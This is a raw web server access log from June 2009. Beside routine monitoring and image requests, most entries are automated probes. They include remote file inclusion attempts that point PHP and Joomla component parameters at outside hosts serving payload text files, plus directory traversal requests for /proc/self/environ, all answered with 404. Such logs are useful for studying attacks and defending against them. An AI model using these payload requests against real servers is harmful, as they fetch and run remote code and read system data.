209.59.12.99 - - [06/Jun/2009:04:36:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [06/Jun/2009:04:36:51 -0400] "GET //index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:04:36:51 -0400] "GET /logs//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:04:36:57 -0400] "GET /logs/access_log.Q109051100//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:04:37:09 -0400] "GET /logs/access_log.Q109052900//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
217.169.210.130 - - [06/Jun/2009:04:37:24 -0400] "GET /logs/error_log.Q109051200/components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.76"
213.198.73.59 - - [06/Jun/2009:04:37:25 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
213.198.73.59 - - [06/Jun/2009:04:37:25 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
213.198.73.59 - - [06/Jun/2009:04:37:25 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
213.198.73.59 - - [06/Jun/2009:04:37:40 -0400] "GET /logs/access_log.Q109052900//admin/classes/TplLoad.php?full_path_to_public_program=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
124.0.73.2 - - [06/Jun/2009:04:38:54 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:39:10 -0400] "GET /logs/access_log.Q109051100%20%20//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:04:39:35 -0400] "GET /logs/access_log.Q109051100%20%20//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:04:39:40 -0400] "GET /logs/access_log.Q109052900%20%20//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
121.254.243.197 - - [06/Jun/2009:04:40:09 -0400] "GET /logs/access_log.Q109052600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
217.169.210.130 - - [06/Jun/2009:04:40:25 -0400] "GET /logs/error_log.Q109052300/components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.76"
212.150.52.114 - - [06/Jun/2009:04:41:09 -0400] "GET /logs/access_log.Q109051100//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://corect.at.ua/idv4.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.805"
212.150.52.114 - - [06/Jun/2009:04:41:09 -0400] "GET //index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://corect.at.ua/idv4.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
212.150.52.114 - - [06/Jun/2009:04:41:10 -0400] "GET /logs//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://corect.at.ua/idv4.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
209.59.12.99 - - [06/Jun/2009:04:41:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.38.54.140 - - [06/Jun/2009:04:42:11 -0400] "GET /logs/access_log.Q109052600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
212.150.52.114 - - [06/Jun/2009:04:42:29 -0400] "GET /logs/access_log.Q109052900//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://corect.at.ua/idv4.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.805"
195.34.78.110 - - [06/Jun/2009:04:42:36 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:42:36 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:42:38 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:42:38 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:42:57 -0400] "GET /logs/access_log.Q109050700//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
222.255.37.201 - - [06/Jun/2009:04:44:12 -0400] "GET /logs/access_log.Q109051100//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://klean-tech.com.tw/upload/idv4.txt?? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
222.255.37.201 - - [06/Jun/2009:04:44:13 -0400] "GET //index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://klean-tech.com.tw/upload/idv4.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
222.255.37.201 - - [06/Jun/2009:04:44:13 -0400] "GET /logs//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://klean-tech.com.tw/upload/idv4.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
218.1.64.133 - - [06/Jun/2009:04:46:09 -0400] "GET //components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 236 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:04:46:09 -0400] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 241 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:04:46:09 -0400] "GET /logs/access_log.Q109051700//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 263 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:04:46:10 -0400] "GET /logs/access_log.Q109051700//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 263 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:04:46:10 -0400] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 241 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:04:46:10 -0400] "GET //components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "XXXXXX"
222.255.37.201 - - [06/Jun/2009:04:46:17 -0400] "GET /logs/access_log.Q109052900//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://klean-tech.com.tw/upload/idv4.txt?? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
218.1.64.133 - - [06/Jun/2009:04:46:33 -0400] "GET /logs/access_log.Q109052600//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 263 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:04:46:41 -0400] "GET /logs/access_log.Q109052600//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 263 "-" "XXXXXX"
209.59.12.99 - - [06/Jun/2009:04:46:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.150.52.114 - - [06/Jun/2009:04:47:44 -0400] "GET //index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://corect.at.ua/idv4.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
218.145.31.131 - - [06/Jun/2009:04:49:04 -0400] "GET /logs/access_log.Q109050700//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
94.23.200.54 - - [06/Jun/2009:04:50:00 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
94.23.200.54 - - [06/Jun/2009:04:50:00 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
94.23.200.54 - - [06/Jun/2009:04:50:00 -0400] "GET /logs/access_log.Q109052200%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
124.0.73.2 - - [06/Jun/2009:04:50:23 -0400] "GET /logs/access_log.Q109052600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:04:51:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.9.3.10 - - [06/Jun/2009:04:53:01 -0400] "GET ///appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
195.9.3.10 - - [06/Jun/2009:04:53:02 -0400] "GET /logs///appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
195.9.3.10 - - [06/Jun/2009:04:53:02 -0400] "GET /logs/access_log.Q109050700///appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jun/2009:04:53:05 -0400] "GET /components/com_simpleboard/image_upload.php?sbp=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jun/2009:04:53:05 -0400] "GET /logs/access_log.Q109052400/components/com_simpleboard/image_upload.php?sbp=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jun/2009:04:53:05 -0400] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
83.132.202.194 - - [06/Jun/2009:04:55:19 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.1; msn OptimizedIE8;PTPT)"
83.132.202.194 - - [06/Jun/2009:04:55:19 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.1; msn OptimizedIE8;PTPT)"
83.132.202.194 - - [06/Jun/2009:04:55:20 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.1; msn OptimizedIE8;PTPT)"
83.132.202.194 - - [06/Jun/2009:04:55:20 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.1; msn OptimizedIE8;PTPT)"
222.255.37.201 - - [06/Jun/2009:04:55:37 -0400] "GET //index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://klean-tech.com.tw/upload/idv4.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
209.59.12.99 - - [06/Jun/2009:04:56:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [06/Jun/2009:04:57:40 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:57:40 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:57:40 -0400] "GET /logs/access_log.Q109052200/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:57:40 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:57:40 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:57:41 -0400] "GET /logs/access_log.Q109052200/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:59:49 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:59:49 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:04:59:49 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:05:00:34 -0400] "GET /logs/access_log.Q109052100%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:05:01:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [06/Jun/2009:05:02:09 -0400] "GET /logs/access_log.Q109052100%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jun/2009:05:03:01 -0400] "GET /logs/access_log.Q109052400%20%20/components/com_simpleboard/image_upload.php?sbp=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:05:03:09 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jun/2009:05:04:18 -0400] "GET /logs/access_log.Q109052500%20%20/components/com_simpleboard/image_upload.php?sbp=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
94.23.200.54 - - [06/Jun/2009:05:04:23 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
94.23.200.54 - - [06/Jun/2009:05:04:23 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
94.23.200.54 - - [06/Jun/2009:05:04:23 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:05:04:32 -0400] "GET /logs/access_log.Q109052100/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
94.23.200.54 - - [06/Jun/2009:05:04:52 -0400] "GET /logs/access_log.Q109050300/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
217.169.210.130 - - [06/Jun/2009:05:06:39 -0400] "GET /logs/access_log.Q109052400/components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.76"
217.169.210.130 - - [06/Jun/2009:05:06:39 -0400] "GET /components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.76"
217.169.210.130 - - [06/Jun/2009:05:06:40 -0400] "GET /logs/components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.76"
67.15.48.60 - - [06/Jun/2009:05:06:42 -0400] "GET /logs/access_log.Q109052300//index.php?cont=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
67.15.48.60 - - [06/Jun/2009:05:06:42 -0400] "GET //index.php?cont=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
67.15.48.60 - - [06/Jun/2009:05:06:42 -0400] "GET /logs//index.php?cont=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
217.169.210.130 - - [06/Jun/2009:05:06:43 -0400] "GET /logs/access_log.Q109052100/components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.76"
217.169.210.130 - - [06/Jun/2009:05:06:44 -0400] "GET /components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.76"
217.169.210.130 - - [06/Jun/2009:05:06:44 -0400] "GET /logs/components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.76"
209.59.12.99 - - [06/Jun/2009:05:06:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.15.48.60 - - [06/Jun/2009:05:07:01 -0400] "GET /logs/error_log.Q108122600//index.php?cont=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
124.217.216.86 - - [06/Jun/2009:05:07:29 -0400] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 259 "-" "libwww-perl/5.826"
217.169.210.130 - - [06/Jun/2009:05:07:35 -0400] "GET /logs/access_log.Q109052600/components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.76"
94.23.200.54 - - [06/Jun/2009:05:07:54 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
94.23.200.54 - - [06/Jun/2009:05:07:54 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
86.96.227.90 - - [06/Jun/2009:05:08:54 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SIMBAR={F6C1E7EF-C80D-4A7F-BCFB-87BF42509DA2}; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
86.96.227.90 - - [06/Jun/2009:05:08:54 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SIMBAR={F6C1E7EF-C80D-4A7F-BCFB-87BF42509DA2}; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
86.96.227.90 - - [06/Jun/2009:05:08:59 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SIMBAR={F6C1E7EF-C80D-4A7F-BCFB-87BF42509DA2}; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
86.96.227.90 - - [06/Jun/2009:05:08:59 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SIMBAR={F6C1E7EF-C80D-4A7F-BCFB-87BF42509DA2}; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
121.15.254.22 - - [06/Jun/2009:05:09:22 -0400] "GET /logs/access_log.Q109051800/write.php?dir=http://klean-tech.com.tw/upload/idv4.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
121.15.254.22 - - [06/Jun/2009:05:09:23 -0400] "GET /write.php?dir=http://klean-tech.com.tw/upload/idv4.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
121.15.254.22 - - [06/Jun/2009:05:09:23 -0400] "GET /logs/write.php?dir=http://klean-tech.com.tw/upload/idv4.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
201.232.54.48 - - [06/Jun/2009:05:10:24 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:05:10:24 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:05:10:24 -0400] "GET /logs/access_log.Q109052700//yabbse/Sources/Packages.php?sourcedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
94.23.200.54 - - [06/Jun/2009:05:11:16 -0400] "GET /logs/access_log.Q109052200/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
74.6.8.112 - - [06/Jun/2009:05:11:28 -0400] "GET /logs/error_log.Q109060100 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
122.153.212.195 - - [06/Jun/2009:05:11:30 -0400] "GET /logs/error_log.Q109053100//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.65"
122.153.212.195 - - [06/Jun/2009:05:11:31 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
122.153.212.195 - - [06/Jun/2009:05:11:31 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
94.23.200.54 - - [06/Jun/2009:05:11:48 -0400] "GET /logs/access_log.Q109053000/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:05:11:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.217.216.86 - - [06/Jun/2009:05:12:09 -0400] "GET /logs/error_log.Q109052000//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 285 "-" "libwww-perl/5.826"
124.217.216.86 - - [06/Jun/2009:05:12:10 -0400] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 259 "-" "libwww-perl/5.826"
124.217.216.86 - - [06/Jun/2009:05:12:10 -0400] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 264 "-" "libwww-perl/5.826"
